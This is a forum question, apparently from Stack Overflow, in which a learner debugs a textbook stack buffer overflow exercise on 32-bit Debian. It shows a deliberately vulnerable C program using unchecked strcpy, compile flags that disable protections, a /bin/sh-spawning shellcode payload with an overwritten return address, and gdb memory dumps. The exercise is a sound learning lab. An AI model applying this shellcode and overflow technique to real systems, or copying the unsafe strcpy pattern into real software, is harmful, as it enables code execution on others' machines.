I'm sure that I got the return address right. But I got a Segmentation fault after returning from the main function.
I'm using 32-bit Debian GNU/Linux 10 (buster).
The c program is:
// victim.c
#include <string.h>
int main(int argc, char* argv[]) {
char little_array[512];
if(argc > 1)
strcpy(little_array, argv[1]);
return 0;
}
Compile it with:
gcc -fno-stack-protector -z execstack -fno-pie -ggdb -mpreferred-stack-boundary=2 victim.c -o victim
My payload is(512 + 8 bytes):
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0476x\xc8\xee\xff\xbf"
Explaination:
shellcode(40 bytes): \xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
padding(476 bytes):%0476x
new return address(shellcode address in stack, 4 bytes):
\xc8\xee\xff\xbf
Output of gdb:
zoemurmure@debian:~/shellcoders/chapter2$ gdb victim
GNU gdb (Debian 8.2.1-2) 8.2.1
...
(gdb) set args $(printf "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0476x\xc8\xee\xff\xbf")
(gdb) disas main
Dump of assembler code for function main:
0x00001199 <+0>: push %ebp
0x0000119a <+1>: mov %esp,%ebp
0x0000119c <+3>: sub $0x200,%esp
0x000011a2 <+9>: cmpl $0x1,0x8(%ebp)
0x000011a6 <+13>: jle 0x11c0 <main+39>
0x000011a8 <+15>: mov 0xc(%ebp),%eax
0x000011ab <+18>: add $0x4,%eax
0x000011ae <+21>: mov (%eax),%eax
0x000011b0 <+23>: push %eax
0x000011b1 <+24>: lea -0x200(%ebp),%eax
0x000011b7 <+30>: push %eax
0x000011b8 <+31>: call 0x11b9 <main+32>
0x000011bd <+36>: add $0x8,%esp
0x000011c0 <+39>: mov $0x0,%eax
0x000011c5 <+44>: leave
0x000011c6 <+45>: ret
End of assembler dump.
(gdb) break main
Breakpoint 1 at 0x11a2: file victim.c, line 5.
(gdb) run
Starting program: /home/zoemurmure/shellcoders/chapter2/victim $(printf "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0476x\xc8\xee\xff\xbf")
Breakpoint 1, main (argc=2, argv=0xbffff164) at victim.c:5
5 if(argc > 1)
(gdb) n
6 strcpy(little_array, argv[1]);
(gdb) x/20x $esp
0xbfffeec8: 0x00000001 0xb7fffc5c 0x3a5d7643 0x0000a1ab
0xbfffeed8: 0xfffff8a0 0xb7f5c362 0xbfffef01 0x00000000
0xbfffeee8: 0xbfffef28 0x00000007 0xb7fd4128 0x6e43a318
0xbfffeef8: 0xb7fffc50 0xb7fdffad 0x00000000 0x00000000
0xbfffef08: 0xb7fd41a0 0x00000007 0xb7fd41c0 0xb7fffc50
(gdb) x/20x $ebp
0xbffff0c8: 0x00000000 0xb7df8b41 0x00000002 0xbffff164
0xbffff0d8: 0xbffff170 0xbffff0f4 0x00000001 0x00000000
0xbffff0e8: 0xb7fb8000 0xffffffff 0xb7fff000 0x00000000
0xbffff0f8: 0xb7fb8000 0xb7fb8000 0x00000000 0x7f85b6f2
0xbffff108: 0x3f7210e2 0x00000000 0x00000000 0x00000000
(gdb) n
8 return 0;
(gdb) x/20x $esp
0xbfffeec8: 0x315e1aeb 0x074688c0 0x5e891e8d 0x0c468908
0xbfffeed8: 0xf3890bb0 0x8d084e8d 0x80cd0c56 0xffffe1e8
0xbfffeee8: 0x69622fff 0x68732f6e 0x30303030 0x30303030
0xbfffeef8: 0x30303030 0x30303030 0x30303030 0x30303030
0xbfffef08: 0x30303030 0x30303030 0x30303030 0x30303030
(gdb) x/20x $ebp
0xbffff0c8: 0x30303030 0xbfffeec8 0x00000000 0xbffff164
0xbffff0d8: 0xbffff170 0xbffff0f4 0x00000001 0x00000000
0xbffff0e8: 0xb7fb8000 0xffffffff 0xb7fff000 0x00000000
0xbffff0f8: 0xb7fb8000 0xb7fb8000 0x00000000 0x7f85b6f2
0xbffff108: 0x3f7210e2 0x00000000 0x00000000 0x00000000
(gdb) n
9 }
(gdb) n
0xbfffeec8 in ?? ()
Notice that:
strcpy(little_array, argv[1]);
, you can see that the new returning address in the output of x/20x $ebp
has been updated to 0xbfffeec80xbfffeec8 in ?? ()
What's the problem? Thx.
User contributions licensed under CC BY-SA 3.0